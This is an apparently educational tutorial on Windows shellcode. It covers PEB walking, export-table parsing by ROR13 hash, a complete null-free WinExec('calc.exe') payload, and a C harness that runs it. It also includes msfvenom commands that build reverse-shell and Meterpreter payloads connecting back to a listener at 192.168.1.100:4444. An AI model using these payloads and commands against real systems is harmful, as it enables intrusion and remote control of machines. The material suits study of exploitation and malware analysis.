Writing Shellcode for Windows
In the Linux shellcode article, we wrote shellcode that called the kernel directly: load registers, trigger int 0x80, done. The kernel’s syscall interface is stable, documented, and numbered. On 32-bit x86, syscall 11 is always execve and syscall 1 is always exit.
Windows doesn’t work that way.
Windows syscall numbers change between versions, sometimes even between service packs and builds. The number assigned to NtCreateFile on Windows 7 is not guaranteed to be the number it has on Windows 10. Microsoft considers the syscall interface private and undocumented. You’re supposed to go through the documented API exported by DLLs such as kernel32.dll and user32.dll, which in turn call into ntdll.dll.
This means Windows shellcode must:
- Find where kernel32.dll is loaded in memory: at runtime, without hardcoding addresses
- Parse kernel32.dll’s export table: walk the PE structure to find function addresses
- Resolve the API functions it needs: WinExec, LoadLibraryA, GetProcAddress, etc.
- Call those functions: finally do something useful
This is significantly more complex than Linux shellcode. But it’s also more elegant — once you understand PEB walking and export parsing, you can call any Windows API function from position-independent shellcode.
The Architecture — Why PEB Walking?
When a Windows process starts, the OS loads several DLLs into its address space. The most important for shellcode:
| DLL | Why We Need It |
|---|---|
| kernel32.dll | Contains WinExec, LoadLibraryA, GetProcAddress, ExitProcess |
| ntdll.dll | Low-level NT functions, always loaded first |
| ws2_32.dll | WinSock — needed for reverse shells (not loaded by default) |
The problem: ASLR randomizes where these DLLs load. We can’t hardcode WinExec = 0x7C8623AD — that address changes every boot.
The solution: every Windows process has a Process Environment Block (PEB) — a data structure that contains, among other things, a linked list of all loaded modules (DLLs) and their base addresses. The PEB is always accessible via a fixed CPU segment register.
TEB (Thread Environment Block)
↓ offset 0x30
PEB (Process Environment Block)
↓ offset 0x0C
PEB_LDR_DATA
↓ offset 0x14
InMemoryOrderModuleList (doubly-linked list)
→ ntdll.dll
→ kernel32.dll (or kernelbase.dll)
→ ...other loaded DLLs
From any thread, at any time, regardless of ASLR:
mov eax, [fs:0x30] ; EAX = PEB address (always works, 32-bit; NASM puts the segment override inside the brackets)
; On 64-bit: mov rax, [gs:0x60]
That’s the entry point. From the PEB, we walk the module list to find kernel32.dll’s base address. From kernel32.dll’s base, we parse the PE export table to find function addresses.
Step 1: Finding kernel32.dll via PEB
The PEB Structure (Relevant Fields)
PEB (at fs:[0x30]):
+0x00 InheritedAddressSpace
+0x08 ImageBaseAddress
+0x0C Ldr → PEB_LDR_DATA
...
PEB_LDR_DATA:
+0x0C InLoadOrderModuleList
+0x14 InMemoryOrderModuleList ← We use this one
+0x1C InInitializationOrderModuleList
Each list entry (LDR_DATA_TABLE_ENTRY; 32-bit offsets relative to its InMemoryOrderLinks field, which is where the list pointers land):
+0x00 InMemoryOrderLinks.Flink (next entry)
+0x04 InMemoryOrderLinks.Blink (previous entry)
+0x08 InInitializationOrderLinks
+0x10 DllBase ← The DLL's base address in memory
+0x14 EntryPoint
+0x18 SizeOfImage
+0x1C FullDllName (UNICODE_STRING)
+0x24 BaseDllName (UNICODE_STRING)
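The DllBase offset of 0x10 can be cross-checked without a debugger. The sketch below models the 32-bit LDR_DATA_TABLE_ENTRY with ctypes and prints each field's offset relative to InMemoryOrderLinks. The class names are made up for this example, and the layout covers only the leading fields of the real structure.

```python
import ctypes

class ListEntry32(ctypes.Structure):
    # 32-bit LIST_ENTRY: two 4-byte pointers
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]

class UnicodeString32(ctypes.Structure):
    # 32-bit UNICODE_STRING: Length, MaximumLength, Buffer pointer
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_uint32)]

class LdrDataTableEntry32(ctypes.Structure):
    # Leading fields only; the real structure continues after BaseDllName
    _fields_ = [("InLoadOrderLinks", ListEntry32),
                ("InMemoryOrderLinks", ListEntry32),
                ("InInitializationOrderLinks", ListEntry32),
                ("DllBase", ctypes.c_uint32),
                ("EntryPoint", ctypes.c_uint32),
                ("SizeOfImage", ctypes.c_uint32),
                ("FullDllName", UnicodeString32),
                ("BaseDllName", UnicodeString32)]

def offsets_from_memory_order_links():
    """Field offsets as seen from a pointer to InMemoryOrderLinks."""
    base = LdrDataTableEntry32.InMemoryOrderLinks.offset
    return {name: getattr(LdrDataTableEntry32, name).offset - base
            for name, _ in LdrDataTableEntry32._fields_}

for field, offset in offsets_from_memory_order_links().items():
    print(f"{offset:+#06x} {field}")
```

InLoadOrderLinks prints with a negative offset because it sits in front of the pointer the walk actually holds.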
The InMemoryOrderModuleList is a doubly-linked list of all loaded modules. The order is:
- The executable itself (e.g., vulnerable.exe)
- ntdll.dll
- kernel32.dll (or kernelbase.dll on Win7+)
So to find kernel32.dll, we follow the list: skip the first entry (the exe), skip the second (ntdll), and the third is kernel32.
Assembly: Walking the PEB
; Find kernel32.dll base address
; 32-bit Windows
xor ecx, ecx
mov eax, [fs:ecx+0x30] ; EAX = PEB (NASM syntax: segment override goes inside the brackets)
mov eax, [eax+0x0C] ; EAX = PEB->Ldr (PEB_LDR_DATA)
mov esi, [eax+0x14] ; ESI = InMemoryOrderModuleList.Flink (first entry)
lodsd ; EAX = second entry (ntdll.dll)
xchg eax, esi ; ESI = second entry
lodsd ; EAX = third entry (kernel32.dll)
mov ebx, [eax+0x10] ; EBX = kernel32.dll base address!
Let’s trace this:
- fs:[0x30] gives us the PEB
- PEB+0x0C gives us PEB_LDR_DATA
- PEB_LDR_DATA+0x14 gives us the first entry in InMemoryOrderModuleList (the .exe)
- First lodsd (loads dword at ESI into EAX, advances ESI) moves to the second entry (ntdll.dll)
- Second lodsd moves to the third entry (kernel32.dll)
- Entry+0x10 gives us the DllBase: kernel32.dll’s base address
EBX now contains kernel32.dll’s base address. This works regardless of ASLR.
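To make the pointer chasing concrete, here is a minimal Python simulation of the same walk. The address space is a plain dictionary mapping addresses to 32-bit values, and every address in it is invented for illustration; only the offsets (0x0C, 0x14, 0x10) come from the walk described above.

```python
def read_dword(memory, address):
    """Read a 32-bit value from the simulated address space."""
    return memory[address]

def find_third_module_base(memory, peb_address):
    ldr = read_dword(memory, peb_address + 0x0C)   # PEB->Ldr
    first = read_dword(memory, ldr + 0x14)         # InMemoryOrderModuleList.Flink (the exe)
    second = read_dword(memory, first)             # first lodsd: follow Flink to ntdll
    third = read_dword(memory, second)             # second lodsd: follow Flink to kernel32
    return read_dword(memory, third + 0x10)        # DllBase of the third entry

# Hypothetical addresses, chosen only so the example is readable.
PEB, LDR = 0x7FFD0000, 0x00251E90
EXE_LINKS, NTDLL_LINKS, K32_LINKS = 0x00252000, 0x00252100, 0x00252200

memory = {
    PEB + 0x0C: LDR,
    LDR + 0x14: EXE_LINKS,
    EXE_LINKS: NTDLL_LINKS,  EXE_LINKS + 0x10: 0x00400000,
    NTDLL_LINKS: K32_LINKS,  NTDLL_LINKS + 0x10: 0x77000000,
    K32_LINKS: LDR + 0x14,   K32_LINKS + 0x10: 0x76000000,   # last Flink points back at the head
}

print(hex(find_third_module_base(memory, PEB)))
```

Each `read_dword(memory, entry)` with no added offset corresponds to one lodsd: the Flink pointer is the first field the list pointer lands on.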
Note on Modern Windows
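The module order is an implementation detail, not a documented guarantee. On Windows 7 and later, kernelbase.dll is also loaded early and can appear ahead of kernel32.dll in the loader lists (this is best known for InInitializationOrderModuleList). kernelbase.dll implements many of the functions that kernel32.dll exports, but not necessarily all of them. For maximum compatibility, some shellcode walks the list and checks each module's name. For simplicity, the third-entry assumption works for most cases.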
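The name-checking variant can be sketched the same way. This is a simulation under stated assumptions, not loader code: `memory` is a dictionary of fake addresses, and `names` stands in for reading each entry's BaseDllName string, which real shellcode would read (and usually hash) from the UNICODE_STRING buffer.

```python
DLL_BASE_OFFSET = 0x10  # DllBase relative to InMemoryOrderLinks (32-bit)

def find_module_base(memory, names, list_head, wanted):
    """Walk the circular module list until the module name matches (case-insensitive)."""
    entry = memory[list_head]              # head.Flink -> first entry
    while entry != list_head:              # the list is circular; stop when back at the head
        if names[entry].lower() == wanted.lower():
            return memory[entry + DLL_BASE_OFFSET]
        entry = memory[entry]              # follow Flink to the next entry
    return None

# Hypothetical layout where kernelbase.dll sits in front of kernel32.dll.
HEAD, EXE, NTDLL, KBASE, K32 = 0x1000, 0x2000, 0x3000, 0x4000, 0x5000
memory = {
    HEAD: EXE,
    EXE: NTDLL,   EXE + 0x10: 0x00400000,
    NTDLL: KBASE, NTDLL + 0x10: 0x77000000,
    KBASE: K32,   KBASE + 0x10: 0x75000000,
    K32: HEAD,    K32 + 0x10: 0x76000000,
}
names = {EXE: "vulnerable.exe", NTDLL: "ntdll.dll",
         KBASE: "KERNELBASE.dll", K32: "KERNEL32.DLL"}

print(hex(find_module_base(memory, names, HEAD, "kernel32.dll")))
```

With this ordering a fixed third-entry lookup would return kernelbase.dll's base, while the name check still lands on kernel32.dll.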
Step 2: Parsing the PE Export Table
Now that we have kernel32.dll’s base address, we need to find specific functions within it. DLLs are PE (Portable Executable) files, and their exported functions are listed in the Export Directory.
PE Structure (from the base address)
Base Address (EBX):
+0x3C e_lfanew → offset to PE signature
PE Signature:
+0x00 "PE\0\0"
+0x78 Export Directory RVA (Relative Virtual Address)
Export Directory:
+0x18 NumberOfNames
+0x1C AddressOfFunctions (RVA array of function addresses)
+0x20 AddressOfNames (RVA array of function name pointers)
+0x24 AddressOfNameOrdinals (RVA array of ordinal values)
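The 0x78 offset is not magic. It is the sum of the header sizes that sit between the PE signature and the first data directory entry. The short sketch below derives it, along with the 64-bit (PE32+) equivalent; the constant names are made up for this example.

```python
PE_SIGNATURE_SIZE = 4                   # "PE\0\0"
FILE_HEADER_SIZE = 20                   # IMAGE_FILE_HEADER
DATA_DIRECTORY_OFFSET_PE32 = 96         # DataDirectory[0] inside IMAGE_OPTIONAL_HEADER32
DATA_DIRECTORY_OFFSET_PE32_PLUS = 112   # DataDirectory[0] inside IMAGE_OPTIONAL_HEADER64

def export_directory_field_offset(pe32_plus=False):
    """Offset from the PE signature to the export directory RVA (DataDirectory[0])."""
    optional = DATA_DIRECTORY_OFFSET_PE32_PLUS if pe32_plus else DATA_DIRECTORY_OFFSET_PE32
    return PE_SIGNATURE_SIZE + FILE_HEADER_SIZE + optional

print(hex(export_directory_field_offset()))                 # 32-bit DLLs
print(hex(export_directory_field_offset(pe32_plus=True)))   # 64-bit DLLs
```

The export directory is the first entry in the data directory array, which is why no further index needs to be added.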
The export resolution process:
- Walk the AddressOfNames array: compare each name to the function we’re looking for
- When we find a match at index i, read the ordinal from AddressOfNameOrdinals[i]
- Use the ordinal to index into AddressOfFunctions: that gives us the function’s RVA
- Add the DLL base address to the RVA: that’s the actual function address
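The steps above can be sketched in Python against a byte buffer. This is an illustration under assumptions: `image` is treated as an already-mapped 32-bit image, so an RVA is simply an offset into the buffer, and `build_demo_image` fabricates a tiny fake image containing only the fields the walk reads (it is not a loadable PE). It compares names directly rather than by hash to keep the lookup logic visible.

```python
import struct

def u32(image, offset):
    return struct.unpack_from("<I", image, offset)[0]

def u16(image, offset):
    return struct.unpack_from("<H", image, offset)[0]

def cstring(image, offset):
    end = image.index(b"\x00", offset)
    return image[offset:end].decode("ascii")

def resolve_export(image, wanted):
    """Return the RVA of the export named `wanted`, or None if it is not exported."""
    pe = u32(image, 0x3C)                         # e_lfanew
    export_dir = u32(image, pe + 0x78)            # Export Directory RVA
    number_of_names = u32(image, export_dir + 0x18)
    functions = u32(image, export_dir + 0x1C)     # AddressOfFunctions
    names = u32(image, export_dir + 0x20)         # AddressOfNames
    ordinals = u32(image, export_dir + 0x24)      # AddressOfNameOrdinals
    for i in range(number_of_names):
        if cstring(image, u32(image, names + 4 * i)) == wanted:
            ordinal = u16(image, ordinals + 2 * i)        # 16-bit entries
            return u32(image, functions + 4 * ordinal)    # 32-bit entries
    return None

def build_demo_image():
    """Fake image with two exports whose name order differs from their function order."""
    image = bytearray(0x400)
    struct.pack_into("<I", image, 0x3C, 0x80)             # e_lfanew
    image[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<I", image, 0x80 + 0x78, 0x200)     # export directory RVA
    struct.pack_into("<IIII", image, 0x200 + 0x18,
                     2, 0x240, 0x250, 0x260)              # NumberOfNames + three array RVAs
    struct.pack_into("<II", image, 0x240, 0x1111, 0x2222) # AddressOfFunctions
    struct.pack_into("<II", image, 0x250, 0x280, 0x290)   # AddressOfNames
    struct.pack_into("<HH", image, 0x260, 1, 0)           # AddressOfNameOrdinals
    image[0x280:0x28C] = b"ExitProcess\x00"
    image[0x290:0x298] = b"WinExec\x00"
    return bytes(image)

demo = build_demo_image()
print(hex(resolve_export(demo, "WinExec")))
```

In the demo image the name at index 0 maps to function slot 1 and vice versa, which is exactly why the ordinal array has to be consulted instead of reusing the name index.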
Assembly: Finding a Function by Name
This is the core routine of every Windows shellcode. We’ll write a function that takes a DLL base address and a function name hash, and returns the function address.
Why Hashing?
Comparing strings byte-by-byte in shellcode is bulky. Instead, we compute a hash of each export name and compare it to a pre-computed hash of the function we want. This saves space significantly.
The most common hash algorithm in shellcode is a simple rotate-and-add:
; Hash function: ROR13 + ADD
; Input: ESI = pointer to ASCII string
; Output: EDX = hash (EAX is clobbered)
compute_hash:
xor edx, edx
xor eax, eax ; Clear EAX so only AL contributes to the add below
.hash_loop:
lodsb ; AL = next byte, ESI++
test al, al
jz .hash_done
ror edx, 13 ; Rotate right by 13
add edx, eax ; Add character value
jmp .hash_loop
.hash_done:
ret
Pre-compute the hash for WinExec:
def ror13_hash(name):
    h = 0
    for c in name:
        # Rotate the 32-bit value right by 13, then add the character
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ord(c)) & 0xFFFFFFFF
    return h

print(hex(ror13_hash("WinExec")))         # 0x0E8AFE98
print(hex(ror13_hash("ExitProcess")))     # 0x73E2D87E
print(hex(ror13_hash("LoadLibraryA")))    # 0xEC0E4E8E
print(hex(ror13_hash("GetProcAddress")))  # 0x7C0DFCAA
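Before hardcoding a hash into shellcode, it is worth checking two things: that none of the names you care about collide, and that the 32-bit constant contains no null byte once encoded as a little-endian immediate. The helper below is a small sketch of that check; `hash_report` is a name invented for this example, and `ror13_hash` is repeated so the block runs on its own.

```python
import struct

def ror13_hash(name):
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ord(c)) & 0xFFFFFFFF
    return h

def hash_report(names):
    """Map each name to (hash, has_null_byte); raise if two names share a hash."""
    seen = {}
    report = {}
    for name in names:
        h = ror13_hash(name)
        if h in seen:
            raise ValueError(f"hash collision: {name} and {seen[h]}")
        seen[h] = name
        # struct.pack("<I", h) gives the bytes exactly as they appear in a mov/push immediate
        report[name] = (h, b"\x00" in struct.pack("<I", h))
    return report

for name, (value, has_null) in hash_report(["WinExec", "ExitProcess", "LoadLibraryA"]).items():
    print(f"{name:<14} 0x{value:08X} null byte: {has_null}")
```

A collision only matters among the exports of the DLL being searched, so in practice the list passed in would be that DLL's export names.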
Assembly: Complete Export Resolution
; find_function: Resolve a function from a DLL by hash
; Input: EBX = DLL base address
; EDX = hash of function name to find
; Output: EAX = function address (0 if not found)
find_function:
pushad ; Save all registers; the caller's EDX (target hash) lands at [esp+0x14]
mov eax, [ebx+0x3C] ; e_lfanew (offset to PE header)
mov edi, [ebx+eax+0x78] ; Export Directory RVA
add edi, ebx ; EDI = Export Directory absolute address
mov ecx, [edi+0x18] ; ECX = NumberOfNames
mov edx, [edi+0x20] ; AddressOfNames RVA
add edx, ebx ; EDX = AddressOfNames absolute (EAX is needed for lodsb)
.find_loop:
jecxz .find_fail ; If no more names, fail
dec ecx
mov esi, [edx+ecx*4] ; ESI = RVA of name[ecx]
add esi, ebx ; ESI = absolute address of name string
; Compute hash of this export name in EBP
xor ebp, ebp
xor eax, eax ; Clear EAX so only AL contributes to the add below
.hash_loop:
lodsb
test al, al
jz .hash_done
ror ebp, 13
add ebp, eax
jmp .hash_loop
.hash_done:
cmp ebp, [esp+0x14] ; Compare with the target hash (caller's EDX in the pushad frame)
jnz .find_loop ; No match, try next name
; Match found! Get the function address
mov eax, [edi+0x24] ; AddressOfNameOrdinals RVA
add eax, ebx
mov cx, [eax+ecx*2] ; CX = ordinal for this name
mov eax, [edi+0x1C] ; AddressOfFunctions RVA
add eax, ebx
mov eax, [eax+ecx*4] ; EAX = function RVA
add eax, ebx ; EAX = function absolute address!
mov [esp+0x1C], eax ; Store result (overwrite saved EAX in pushad frame)
popad
ret
.find_fail:
popad
xor eax, eax
ret
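The stack offsets used around pushad are easy to get wrong, so it helps to derive them rather than memorize them. The sketch below computes where each saved register sits relative to ESP immediately after pushad runs at the top of a called function; `pushad_frame_offsets` is a name made up for this example.

```python
# Order in which pushad pushes the registers (EAX first, EDI last).
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

def pushad_frame_offsets():
    """Offsets from ESP right after pushad, inside a function reached via call."""
    offsets = {}
    # The last register pushed (EDI) ends up at [esp+0]; EAX, pushed first, is highest.
    for slot, register in enumerate(reversed(PUSHAD_ORDER)):
        offsets[register] = slot * 4
    # The return address was pushed by call before pushad ran.
    offsets["return address"] = len(PUSHAD_ORDER) * 4
    return offsets

for name, offset in pushad_frame_offsets().items():
    print(f"[esp+0x{offset:02X}] {name}")
```

The saved EAX slot at 0x1C is the one popad restores into EAX, which is why writing the result there turns it into the return value. A value passed in a register such as EDX is read back from its own saved slot, whereas anything at 0x24 and above would be an argument pushed on the stack by the caller.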
Step 3: Putting It All Together — WinExec Shellcode
Now we combine PEB walking + export resolution + the actual payload.
Complete WinExec(“calc.exe”) Shellcode
[BITS 32]
cld ; Clear direction flag
; ===== FIND KERNEL32.DLL =====
xor ecx, ecx
mov eax, [fs:ecx+0x30] ; PEB (NASM syntax: segment override inside the brackets)
mov eax, [eax+0x0C] ; PEB->Ldr
mov esi, [eax+0x14] ; InMemoryOrderModuleList
lodsd ; Skip exe entry → ntdll
xchg eax, esi
lodsd ; Skip ntdll → kernel32
mov ebx, [eax+0x10] ; EBX = kernel32.dll base
; ===== FIND WinExec =====
mov edx, 0x0E8AFE98 ; Hash of "WinExec"
call find_function ; EAX = WinExec address
mov edi, eax ; Save WinExec address in EDI
; ===== FIND ExitProcess =====
mov edx, 0x73E2D87E ; Hash of "ExitProcess"
call find_function ; EAX = ExitProcess address
mov esi, eax ; Save ExitProcess address in ESI
; ===== CALL WinExec("calc.exe", 0) =====
xor ecx, ecx
push ecx ; null terminator
push 0x6578652E ; ".exe"
push 0x636C6163 ; "calc"
mov eax, esp ; EAX = pointer to "calc.exe\0" on stack
push ecx ; uCmdShow = 0 (SW_HIDE)
push eax ; lpCmdLine = "calc.exe"
call edi ; Call WinExec("calc.exe", 0)
; ===== CALL ExitProcess(0) =====
xor ecx, ecx
push ecx ; Exit code = 0
call esi ; Call ExitProcess(0)
; ===== FIND_FUNCTION SUBROUTINE =====
find_function:
pushad ; Caller's EDX (target hash) is saved at [esp+0x14]
mov eax, [ebx+0x3C]
mov edi, [ebx+eax+0x78]
add edi, ebx
mov ecx, [edi+0x18]
mov edx, [edi+0x20]
add edx, ebx ; EDX = AddressOfNames (EAX is needed for lodsb)
.find_loop:
jecxz .find_fail
dec ecx
mov esi, [edx+ecx*4]
add esi, ebx
xor ebp, ebp ; EBP accumulates the hash
xor eax, eax ; Clear EAX so only AL contributes to the add below
.hash_loop:
lodsb
test al, al
jz .hash_compare
ror ebp, 13
add ebp, eax
jmp .hash_loop
.hash_compare:
cmp ebp, [esp+0x14] ; Target hash = caller's EDX in the pushad frame
jnz .find_loop
mov eax, [edi+0x24]
add eax, ebx
mov cx, [eax+ecx*2]
mov eax, [edi+0x1C]
add eax, ebx
mov eax, [eax+ecx*4]
add eax, ebx
mov [esp+0x1C], eax
popad
ret
.find_fail:
popad
xor eax, eax
ret
Compiling and Testing
# Assemble
$ nasm -f bin shellcode.asm -o shellcode.bin
# Check for null bytes (prints the number of 00 bytes; must be 0)
$ xxd -p -c 1 shellcode.bin | grep -c '^00$'
# Extract as hex string
$ xxd -p shellcode.bin | tr -d '\n'
# Check size
$ wc -c shellcode.bin
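If you prefer to see where the offending bytes are rather than just whether any exist, a few lines of Python do the job. This is a minimal sketch; `find_bad_bytes` is a name invented here, and the optional `bad` parameter lets you add other characters your delivery mechanism rejects.

```python
def find_bad_bytes(blob, bad=b"\x00"):
    """Return (offset, value) for every byte in blob that appears in bad."""
    return [(offset, byte) for offset, byte in enumerate(blob) if byte in bad]

# First bytes of the PEB walk: cld / xor ecx, ecx / mov eax, [fs:ecx+0x30]
sample = bytes.fromhex("fc31c9648b4130")
print(find_bad_bytes(sample))

# push 0 assembles to 6A 00, so the null shows up at offset 1
print(find_bad_bytes(b"\x6a\x00"))
```

To check the assembled file, read it with `open("shellcode.bin", "rb").read()` and pass the result in.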
The C Test Harness
#include <stdio.h>
#include <string.h>   // memcpy
#include <windows.h>
unsigned char shellcode[] =
    "\xfc\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14"
    "\xad\x96\xad\x8b\x58\x10..." // (full shellcode bytes here)
    ;
int main(void) {
    // sizeof yields size_t; cast so the format specifier matches
    printf("Shellcode length: %u\n", (unsigned)(sizeof(shellcode) - 1));
    // Allocate executable memory
    void *exec = VirtualAlloc(NULL, sizeof(shellcode),
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(exec, shellcode, sizeof(shellcode));
    // Execute
    ((void (*)(void))exec)();
    return 0;
}
Compile with:
> gcc -o test test.c -m32
> test.exe
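Calculator should launch. Note that the shellcode passes uCmdShow = 0 (SW_HIDE), so on systems where calc.exe honors that value the window may start hidden. If nothing appears, check the process list, or pass 1 (SW_SHOWNORMAL) instead.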
Avoiding Null Bytes
Just like Linux shellcode, null bytes (\x00) terminate C strings and break many exploit delivery mechanisms. Common null byte sources and fixes:
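| Problem | Contains Null | Fix |
|---|---|---|
| mov eax, 0 | \xB8\x00\x00\x00\x00 | xor eax, eax |
| push 0 | \x6A\x00 | xor ecx, ecx; push ecx |
| mov edx, 0x0E8AFE98 | May contain \x00 | Check each constant; this one doesn’t |
| String “calc.exe\0” | Null terminator | Push null via xor ecx,ecx; push ecx before pushing the string |
| push 0x00636C61 | Zero in the top byte of the immediate | Rearrange or pad the string so every pushed dword is fully populated, or encode the value differently |
| call find_function (forward call) | \xE8 followed by a small positive rel32, whose upper bytes are \x00 | Place the subroutine before its callers so the displacement is negative |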
The string pushing technique:
; Push "calc.exe\0" onto the stack (no null bytes in the code)
xor ecx, ecx
push ecx ; Push null terminator (\0)
; "calc.exe" = 63 61 6C 63 2E 65 78 65
; In little-endian dwords:
push 0x6578652E ; ".exe" (backwards: 2E 65 78 65)
push 0x636C6163 ; "calc" (backwards: 63 61 6C 63)
mov eax, esp ; EAX points to "calc.exe\0"
Each push puts 4 bytes on the stack in little-endian order. The null terminator is pushed first (via push ecx where ECX=0).
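Working out the little-endian dwords by hand gets tedious for longer strings. The helper below is a small sketch that generates the push sequence; `string_to_pushes` is a made-up name, and to stay simple it only accepts strings whose length is a multiple of 4, since other lengths would put a null byte inside an immediate.

```python
import struct

def string_to_pushes(text):
    """Return assembly lines that build text plus a null terminator on the stack."""
    data = text.encode("ascii")
    if len(data) % 4 != 0:
        raise ValueError("length must be a multiple of 4 for this simple sketch")
    lines = ["xor ecx, ecx", "push ecx"]            # null terminator first
    for start in range(len(data) - 4, -1, -4):       # last chunk is pushed first
        (dword,) = struct.unpack_from("<I", data, start)
        lines.append(f"push 0x{dword:08X}")
    lines.append("mov eax, esp")                     # EAX -> start of the string
    return lines

print("\n".join(string_to_pushes("calc.exe")))
```

The chunks are pushed in reverse because the stack grows downward: the last push ends up at the lowest address, which is where the string has to start.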
Reverse Shell Shellcode
A calculator pop is a proof of concept. For real exploitation, we need a reverse shell. This requires loading ws2_32.dll (WinSock), which isn’t loaded by default.
The Strategy
- Find kernel32.dll → resolve LoadLibraryA and GetProcAddress
- Call LoadLibraryA("ws2_32.dll") → load WinSock
- Use GetProcAddress to find: WSAStartup, WSASocketA, connect
- Initialize WinSock, create a socket, connect to the attacker
- Redirect stdin/stdout/stderr to the socket
- Spawn cmd.exe
Shellcode flow:
PEB → kernel32.dll base
→ LoadLibraryA("ws2_32.dll") → ws2_32.dll base
→ WSAStartup(0x0202, &wsadata)
→ WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
→ connect(sock, {AF_INET, port, IP}, 16)
→ CreateProcessA("cmd.exe", ..., stdin=sock, stdout=sock, stderr=sock)
This is substantially more complex than Linux reverse shell shellcode (which is ~70 bytes using raw syscalls). Windows reverse shell shellcode is typically 300-500 bytes due to the PEB walking, export resolution, and WinSock setup overhead.
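One detail in the flow above that often trips people up is the `{AF_INET, port, IP}` argument to connect. It is a 16-byte sockaddr_in structure with mixed byte orders. The sketch below packs one in Python so the layout can be inspected; `pack_sockaddr_in` is a name invented for this example, and the address and port are the same placeholder values used in the msfvenom commands in this article.

```python
import socket
import struct

def pack_sockaddr_in(ip, port):
    """Build the 16-byte sockaddr_in that connect() expects on 32-bit Windows."""
    return (struct.pack("<H", socket.AF_INET)   # sin_family: host (little-endian) order
            + struct.pack(">H", port)           # sin_port: network (big-endian) order
            + socket.inet_aton(ip)              # sin_addr: 4 bytes, network order
            + b"\x00" * 8)                      # sin_zero padding

addr = pack_sockaddr_in("192.168.1.100", 4444)
print(len(addr), addr.hex())
```

Note that sin_family and the padding contain zero bytes, so the structure cannot be embedded literally in null-free shellcode and is typically built on the stack at runtime.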
In practice, most exploit developers use msfvenom to generate Windows shellcode:
# Windows reverse shell shellcode
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
-f c -a x86 --platform windows -b "\x00"
# Windows Meterpreter (staged)
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
-f c -a x86 --platform windows -b "\x00"
# Exec calc.exe (proof of concept)
$ msfvenom -p windows/exec CMD=calc.exe \
-f c -a x86 --platform windows -b "\x00"
But understanding how it works under the hood — PEB walking, export parsing, API resolution — is essential for writing custom payloads, debugging failed exploits, and analyzing malware.
Linux vs Windows Shellcode — Complete Comparison
| Aspect | Linux | Windows |
|---|---|---|
| Syscall interface | Stable, numbered (int 0x80 / syscall) | Unstable, undocumented (changes per version) |
| How to call OS | Load registers, trigger interrupt | Must find and call DLL functions dynamically |
| Finding functions | Not needed (syscall numbers are fixed) | Walk PEB → parse PE exports → resolve by hash |
| Position independence | jmp-call-pop for data references | PEB walking is inherently position-independent |
| Typical size (shell) | 25-50 bytes | 200-500 bytes |
| Null byte avoidance | Same techniques | Same techniques |
| Reverse shell size | 70-100 bytes | 300-500 bytes |
| Complexity | Simple (register + interrupt) | Complex (PEB + PE parsing + API calls) |
| Key skill | Understanding syscall ABI | Understanding PE format and Windows internals |
| Encoding | shikata_ga_nai, XOR | Same encoders work |
The size difference is dramatic. A Linux execve("/bin/sh") shellcode can be as small as 21 bytes. The equivalent Windows shellcode (finding kernel32, resolving WinExec, calling it) is roughly 150 bytes or more. The gap comes almost entirely from the extra work of dynamic API resolution.
Debugging Shellcode with x32dbg
When shellcode doesn’t work (and it often doesn’t on the first try), x32dbg is your best friend.
Method 1: Test Harness
Compile the C test harness (above), load it in x32dbg, and step through:
1. Set breakpoint at the VirtualAlloc return
2. After VirtualAlloc, note the allocated memory address
3. Set breakpoint at the call to the shellcode (the function pointer call)
4. Step into — you're now inside your shellcode
5. Step through instruction by instruction
6. Watch registers and the stack at each step
Method 2: Inject into a Process
1. Load target process in x32dbg
2. Allocate memory: right-click memory map → Allocate Memory
3. Write shellcode bytes to the allocated region
4. Set EIP to the shellcode address
5. Step through
Key Things to Watch
- EBX after PEB walk: Does it contain a valid kernel32.dll base? (Should look like 0x7xxx0000)
- The export table parse: Is EDI pointing to a valid Export Directory? Check with Memory Map to verify it’s within kernel32.dll’s range.
- The hash comparison: Set a conditional breakpoint on the cmp instruction to catch when your target hash matches.
- The function address: After find_function returns, is EAX a valid code address within kernel32.dll?
- The stack before API calls: Are arguments in the right order? Is the stack aligned?
Further Reading and Tools
| Resource | Purpose |
|---|---|
| msfvenom | Generate Windows shellcode for any payload |
| Donut | Convert .NET assemblies and PE files into position-independent shellcode |
| SysWhispers | Generate direct syscall stubs (bypass API hooking by EDR) |
| Shellcode compiler (scc) | Compile C code into position-independent shellcode |
| PE-bear | GUI PE parser — helps understand DLL structures |
| Windows Internals (book) | Deep dive into PEB, TEB, and loader internals |
Final Thoughts
Windows shellcode is harder than Linux shellcode. There’s no way around it. The PEB walking, PE export parsing, and dynamic API resolution add complexity that simply doesn’t exist on Linux. A Linux shellcode writer thinks about registers and syscall numbers. A Windows shellcode writer thinks about PE structures, linked lists, and hash-based function resolution.
But this complexity is also what makes it interesting. The PEB walk is an elegant solution to a real problem — finding code at runtime without any hardcoded addresses. It’s the same technique that malware uses to resolve API functions dynamically (making static analysis harder). Understanding it gives you insight into both offensive and defensive security on Windows.
If you’ve followed the Linux and Windows exploit development series to this point — from basic GDB reversing through stack overflows, ret2libc, and now shellcode internals — you have a solid foundation in low-level exploitation on both platforms.
Happy reversing!